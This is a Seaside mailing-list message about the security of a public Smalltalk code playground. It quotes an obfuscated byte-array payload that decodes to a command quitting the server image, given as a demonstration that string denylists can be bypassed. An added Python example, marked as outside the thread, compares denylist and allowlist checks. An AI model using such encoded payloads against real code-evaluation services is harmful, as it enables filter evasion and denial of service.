[Seaside] Seaside playground
stephane ducasse
stephane.ducasse at free.fr
Tue Jan 12 08:39:11 UTC 2010
Lukas
Could they use your trick with using the debugger to interpret bytecode you did years ago?
Stef
On Jan 11, 2010, at 10:13 AM, Lukas Renggli wrote:
>> That's not a simple hack.
>> And it doesn't really take over the computer.
>
> Sure. As soon as I can execute arbitrary Smalltalk code on your
> machine, I can deploy a Trojan for your platform.
>
>> Anyway, such hacks are not possible anymore.
>
> There is an infinite number of other hacks. It gets harder over time,
> but the one below is particularly simple:
>
> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>
> My point is that no matter how much time you spend on making it secure
> by checking for particular patterns or strings, there will always be
> ways to fool it. In the Smalltalk world security is inherently weak,
> mostly because of the strong reflective capabilities. I would really
> love to see your application on the web, but in its current form we
> won't be able to run it on seaside.st.
>
> Lukas
>
> --
> Lukas Renggli
> http://www.lukas-renggli.ch
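Added example, not part of the original thread: a Python model of the pattern check discussed above, run against a constructed snippet that hides a statement in a byte-array literal the same way the quoted message does. The denylist, the allowed-token set and all function names are assumptions made for illustration, not the playground's or Seaside's own code.

```python
import re

# Hypothetical denylist a playground might apply to submitted Smalltalk source.
DENYLIST = ("SmalltalkImage", "snapshot:", "andQuit:")
# Hypothetical default-deny list: the only identifiers a snippet may contain.
ALLOWED_TOKENS = {"html", "heading:", "paragraph:", "text:", "with:"}

STRING = re.compile(r"'(?:[^']|'')*'")      # Smalltalk string literal
BYTE_ARRAY = re.compile(r"#\[([\d\s]*)\]")  # #[83 109 ...] literal
TOKEN = re.compile(r"[A-Za-z_]\w*:?")       # identifier or keyword selector

def denylist_ok(source):
    """Naive check: accept unless a forbidden string appears literally."""
    return not any(word in source for word in DENYLIST)

def decoded_literals(source):
    """Text each byte-array literal turns into when sent asString."""
    out = []
    for m in BYTE_ARRAY.finditer(source):
        values = [int(n) for n in m.group(1).split()]
        if all(v < 256 for v in values):    # larger values are not valid bytes
            out.append(bytes(values).decode("latin-1"))
    return out

def denylist_with_decoding_ok(source):
    """Denylist that also scans decoded literals; covers this one encoding only."""
    return denylist_ok(source) and all(denylist_ok(t) for t in decoded_literals(source))

def allowlist_ok(source):
    """Default deny: every identifier outside literals must be explicitly allowed."""
    code = BYTE_ARRAY.sub(" ", STRING.sub(" ", source))
    return all(tok in ALLOWED_TOKENS for tok in TOKEN.findall(code))

def as_byte_array(text):
    return "#[" + " ".join(str(b) for b in text.encode("latin-1")) + "]"

# Constructed samples: the statement is hidden the same way as in the message above.
HIDDEN = "SmalltalkImage current snapshot: false andQuit: true"
ENCODED = "html evaluateUnloggedForSelf: " + as_byte_array(HIDDEN) + " asString"
BENIGN = "html heading: 'Hello'. html paragraph: 'world'"

if __name__ == "__main__":
    for name, check in [("denylist", denylist_ok),
                        ("denylist + decoding", denylist_with_decoding_ok),
                        ("allowlist", allowlist_ok)]:
        print(f"{name:20} encoded={check(ENCODED)} benign={check(BENIGN)}")
```

The decoding-aware denylist catches only this one encoding, which is the point made in the quoted message; the default-deny check rejects the snippet without having to recognise what it hides.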